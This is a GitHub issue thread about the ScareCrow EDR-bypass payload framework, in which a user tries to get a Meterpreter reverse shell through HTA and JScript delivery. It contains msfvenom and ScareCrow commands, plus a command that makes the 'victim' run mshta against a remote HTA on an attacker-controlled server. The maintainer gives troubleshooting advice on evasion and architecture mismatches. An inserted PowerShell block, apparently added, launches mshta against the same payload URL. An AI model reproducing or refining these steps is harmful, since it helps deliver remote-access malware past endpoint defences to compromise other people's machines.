optiv / ScareCrow

ScareCrow - Payload creation framework designed around EDR bypass.
2.71k stars 503 forks

Delivery HTA with Loaders Control or Wscript not working #65

Closed Vyiel closed 1 year ago

Vyiel commented 2 years ago

Bin file: Stageless -> msfvenom -p windows/x64/meterpreter_reverse_tcp. EXE files are deleted on download by EDRs, but for HTA deliveries a reverse shell isn't happening.

Commands run:

./ScareCrow -I new64.bin -domain microsoft.com -delivery hta -url http://10.0.0.12:8000 -Loader control -O testhta.hta
./ScareCrow -I new64.bin -domain microsoft.com -delivery hta -url http://10.0.0.12:8000 -Loader control -O jstest.js
./ScareCrow -I new64.bin -domain microsoft.com -delivery hta -url http://10.0.0.12:8000 -Loader wscript -O jstest.js

None of them are giving back a reverse shell.

Tylous commented 2 years ago

have you tried without the HTA flag to see if it's something outside of the HTA?

Vyiel commented 2 years ago

Yes, it worked with Binary and it does give me a rev shell, both with and without the HTA flag and a delivery, and just running it locally as well. The HTA definitely didn't work. The JS did once when run locally.

Vyiel commented 2 years ago

@Tylous Also noticed something from ProcExp and ProcMon: MSHTA keeps running and gets stuck, and if I close the file server, MSHTA comes back with a "connection lost" error.

Tylous commented 2 years ago

So I can't tell you what's happening with the limited information and three different cases. So to address things first: the JS script will only work once unless you terminate the other shell, as it side-loads a DLL to execute the shellcode; if that DLL is already being used by another beacon/call process it won't work. As for the MSHTA issue: the default MSHTA is 32-bit, so if you're calling it from the command prompt, or in any way that is not a full path to the 64-bit one, you will more than likely be spawning the 32-bit version. All secondary actions will be in the context of a 32-bit process, meaning your 64-bit shellcode won't work.

Vyiel commented 2 years ago

Thanks for clearing this up, but it still doesn't seem to work.

Command run for payload creation: ./ScareCrow -I 125-4444.bin -Loader control -O ms64.hta -delivery hta -url http://192.168.1.125:8000 -domain google.com

Command run on victim: C:\Windows\SysWOW64> mshta.exe http://192.168.1.125:8000/ms64.hta

Thus, getting a 64 bit version of MSHTA.

Tylous commented 2 years ago

Please note the picture below

[image]

Vyiel commented 2 years ago

Wow, Can you help me with where can I find the 64 bit one? Please?

Tylous commented 2 years ago

This is beyond the realm of the issue tracker for ScareCrow, but very briefly: the system32 one is the correct one. The problem is the command you are calling; if you don't call the one from system32 properly, it might default to the 32-bit version. To ensure you call the RIGHT mshta you need to be in the right folder or call it with the exact path. Please note below how calling mshta.exe from system32 works fine:

[image]
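The bitness question above is easy to settle on the target itself. On 64-bit Windows, C:\Windows\System32\mshta.exe is the 64-bit binary and C:\Windows\SysWOW64\mshta.exe the 32-bit one, and a 32-bit shell that opens System32 is silently redirected to SysWOW64 unless it uses the Sysnative alias. The following PowerShell is an added example, not code from ScareCrow or from anyone in this thread; it assumes a 64-bit Windows host, and the .hta URL is the placeholder value from the thread. It launches both copies by explicit path and asks the kernel (IsWow64Process) which architecture each resulting process actually is.

```powershell
# Added example, not ScareCrow project code.
# Assumes 64-bit Windows; the .hta URL is the placeholder from the thread.

Add-Type -Namespace Native -Name Wow64 -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool IsWow64Process(IntPtr hProcess, [MarshalAs(UnmanagedType.Bool)] out bool wow64Process);
'@

function Get-ProcessBitness {
    # Returns '32-bit (WOW64)' or '64-bit' for a running process on 64-bit Windows.
    param([Parameter(Mandatory)][System.Diagnostics.Process]$Process)
    $isWow64 = $false
    if (-not [Native.Wow64]::IsWow64Process($Process.Handle, [ref]$isWow64)) {
        throw "IsWow64Process failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    if ($isWow64) { '32-bit (WOW64)' } else { '64-bit' }
}

# First: what does a bare "mshta" resolve to from the shell you are typing in?
$shellBits = if ([Environment]::Is64BitProcess) { 64 } else { 32 }
"This PowerShell is $shellBits-bit; bare 'mshta' resolves to $((Get-Command mshta.exe).Source)"

# A 32-bit shell has System32 redirected to SysWOW64; Sysnative is the way out.
$mshta64 = if ($shellBits -eq 64) { "$env:windir\System32\mshta.exe" } else { "$env:windir\Sysnative\mshta.exe" }
$mshta32 = "$env:windir\SysWOW64\mshta.exe"

$hta = 'http://192.168.1.125:8000/ms64.hta'   # placeholder URL from the thread

foreach ($path in @($mshta64, $mshta32)) {
    $p = Start-Process -FilePath $path -ArgumentList $hta -PassThru
    Start-Sleep -Seconds 2          # give mshta time to load before querying it
    $p.Refresh()
    if ($p.HasExited) { "$path exited early (code $($p.ExitCode))"; continue }
    "{0} -> PID {1}: {2}" -f $path, $p.Id, (Get-ProcessBitness $p)
}
```

Run it from the same shell you would use on the victim. If the System32 path reports "32-bit (WOW64)", the shell itself is 32-bit and redirected you; launching from a 64-bit shell (or via Sysnative) is what puts a 64-bit mshta, and therefore 64-bit shellcode, in play. A process started from SysWOW64 will always report 32-bit.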

Vyiel commented 2 years ago

Extremely sorry for branching out, but when I was searching the internet for this, I found out that if we launch mshta.exe from a 32-bit cmd, then mshta will also be 32-bit, and vice versa. So I tested it out, only to see it fail again.

I have tested with a binary loader just to see if the shellcode had any problems, and it turns out the binary is working fine and mshta doesn't, even if it's 64-bit.

[image: mshta]

Tylous commented 2 years ago

Did you try executing mshta.exe from c:\windows\system32? Because that picture doesn't show that you did it from that directory.

Vyiel commented 2 years ago

[image]

Vyiel commented 2 years ago

Respectfully and patiently asking. Please let me know on any updates regarding this. Thanks a lot